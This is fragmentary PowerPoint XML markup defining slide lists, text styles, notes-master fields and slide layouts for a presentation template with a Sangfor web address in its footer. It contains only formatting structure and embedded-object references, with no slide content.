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6"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="277" r:id="rId2"/>
    <p:sldId id="336" r:id="rId3"/>
    <p:sldId id="549" r:id="rId4"/>
    <p:sldId id="648" r:id="rId5"/>
    <p:sldId id="690" r:id="rId6"/>
    <p:sldId id="691" r:id="rId7"/>
    <p:sldId id="689" r:id="rId8"/>
    <p:sldId id="692" r:id="rId9"/>
    <p:sldId id="704" r:id="rId10"/>
    <p:sldId id="705" r:id="rId11"/>
    <p:sldId id="706" r:id="rId12"/>
    <p:sldId id="707" r:id="rId13"/>
    <p:sldId id="708" r:id="rId14"/>
    <p:sldId id="709" r:id="rId15"/>
    <p:sldId id="710" r:id="rId16"/>
    <p:sldId id="711" r:id="rId17"/>
    <p:sldId id="712" r:id="rId18"/>
    <p:sldId id="713" r:id="rId19"/>
    <p:sldId id="714" r:id="rId20"/>
    <p:sldId id="715" r:id="rId21"/>
    <p:sldId id="716" r:id="rId22"/>
    <p:sldId id="717" r:id="rId23"/>
    <p:sldId id="718" r:id="rId24"/>
    <p:sldId id="719" r:id="rId25"/>
    <p:sldId id="720" r:id="rId26"/>
    <p:sldId id="721" r:id="rId27"/>
    <p:sldId id="722" r:id="rId28"/>
    <p:sldId id="723" r:id="rId29"/>
    <p:sldId id="724" r:id="rId30"/>
    <p:sldId id="725" r:id="rId31"/>
    <p:sldId id="726" r:id="rId32"/>
    <p:sldId id="727" r:id="rId33"/>
    <p:sldId id="728" r:id="rId34"/>
    <p:sldId id="729" r:id="rId35"/>
    <p:sldId id="730" r:id="rId36"/>
    <p:sldId id="731" r:id="rId37"/>
    <p:sldId id="732" r:id="rId38"/>
    <p:sldId id="733" r:id="rId39"/>
    <p:sldId id="734" r:id="rId40"/>
    <p:sldId id="735" r:id="rId41"/>
    <p:sldId id="736" r:id="rId42"/>
    <p:sldId id="737" r:id="rId43"/>
    <p:sldId id="738" r:id="rId44"/>
    <p:sldId id="693" r:id="rId45"/>
    <p:sldId id="694" r:id="rId46"/>
    <p:sldId id="695" r:id="rId47"/>
    <p:sldId id="696" r:id="rId48"/>
    <p:sldId id="697" r:id="rId49"/>
    <p:sldId id="698" r:id="rId50"/>
    <p:sldId id="699" r:id="rId51"/>
    <p:sldId id="700" r:id="rId52"/>
    <p:sldId id="701" r:id="rId53"/>
    <p:sldId id="702" r:id="rId54"/>
    <p:sldId id="703" r:id="rId55"/>
    <p:sldId id="739" r:id="rId56"/>
    <p:sldId id="740" r:id="rId57"/>
    <p:sldId id="741" r:id="rId58"/>
    <p:sldId id="742" r:id="rId59"/>
    <p:sldId id="743" r:id="rId60"/>
    <p:sldId id="744" r:id="rId61"/>
    <p:sldId id="745" r:id="rId62"/>
    <p:sldId id="746" r:id="rId63"/>
    <p:sldId id="748" r:id="rId64"/>
    <p:sldId id="747" r:id="rId65"/>
    <p:sldId id="749" r:id="rId66"/>
    <p:sldId id="750" r:id="rId67"/>
    <p:sldId id="751" r:id="rId68"/>
    <p:sldId id="752" r:id="rId69"/>
    <p:sldId id="753" r:id="rId70"/>
    <p:sldId id="754" r:id="rId71"/>
    <p:sldId id="755" r:id="rId72"/>
    <p:sldId id="686" r:id="rId73"/>
    <p:sldId id="687" r:id="rId74"/>
    <p:sldId id="279" r:id="rId75"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="zh-TW"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="PMingLiU"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B84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264" autoAdjust="0"/>
    <p:restoredTop sz="88547" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="84" d="100"/>
          <a:sy n="84" d="100"/>
        </p:scale>
        <p:origin x="-954" y="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10244"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3E43A7AD-B18F-41E0-9CA5-5E2CD3D7B7AD}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21967923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PMingLiU" pitchFamily="18" charset="-120"/>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PMingLiU" pitchFamily="18" charset="-120"/>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PMingLiU" pitchFamily="18" charset="-120"/>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PMingLiU" pitchFamily="18" charset="-120"/>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PMingLiU"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3E43A7AD-B18F-41E0-9CA5-5E2CD3D7B7A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17</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18</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19</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20</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21</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22</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23</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24</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26</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27</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3E43A7AD-B18F-41E0-9CA5-5E2CD3D7B7AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="75892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28</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29</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30</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31</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32</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33</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34</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35</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36</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37</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4</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38</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39</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40</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41</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42</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43</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45</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46</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47</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48</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10</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49</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50</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51</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52</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53</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54</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55</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56</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57</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58</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11</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59</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60</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61</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62</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63</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64</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65</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66</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67</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68</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13</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69</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70</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71</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73</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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="598243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14</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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4145384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43A7AD-B18F-41E0-9CA5-5E2CD3D7B7AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41453845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
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="C:\Documents and Settings\cjw\桌面\01 办公系统.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="394" t="211" r="157" b="398"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143999" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="785812" y="1196752"/>
            <a:ext cx="7026548" cy="718964"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3900" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>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785812" y="1953988"/>
            <a:ext cx="7026547" cy="538907"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34"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 name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7308304" y="260648"/>
            <a:ext cx="1449388" cy="458787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-15875" y="6523038"/>
            <a:ext cx="9172575" cy="371475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="直接连接符 3"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="468313" y="907132"/>
            <a:ext cx="8207375" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="2646040"/>
            <a:ext cx="7776864" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="4000"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cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7308304" y="260648"/>
            <a:ext cx="1449388" cy="458787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-15875" y="6523038"/>
            <a:ext cx="9172575" cy="371475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="直接连接符 3"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="468313" y="907132"/>
            <a:ext cx="8207375" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="8229600" cy="706090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800"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userDrawn="1">
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1340768"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr sz="20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2000">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr sz="2000">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr sz="2000">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3" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7308304" y="260648"/>
            <a:ext cx="1449388" cy="458787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-15875" y="6523038"/>
            <a:ext cx="9172575" cy="371475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="直接连接符 3"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="468313" y="907132"/>
            <a:ext cx="8207375" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="8229600" cy="706090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800"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结束">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矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="5974348"/>
            <a:ext cx="1808899" cy="5293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userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="5974349"/>
            <a:ext cx="2066335" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>www.sangfor.com.cn</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14542851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4" r:id="rId1"/>
    <p:sldLayoutId id="2147483701" r:id="rId2"/>
    <p:sldLayoutId id="2147483695" r:id="rId3"/>
    <p:sldLayoutId id="2147483699" r:id="rId4"/>
    <p:sldLayoutId id="2147483702" r:id="rId5"/>
    <p:sldLayoutId id="2147483700" r:id="rId6"/>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PMingLiU" pitchFamily="18" charset="-120"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
          <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
          <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
          <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
          <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
          <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
          <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
          <a:ea typeface="PMingLiU" pitchFamily="18" charset="-12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embeddings/oleObject1.bin"/></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oleObject" Target="../embeddings/oleObject2.bin"/></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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="785812" y="1196752"/>
            <a:ext cx="7962652" cy="718964"/>
          </a:xfrm>
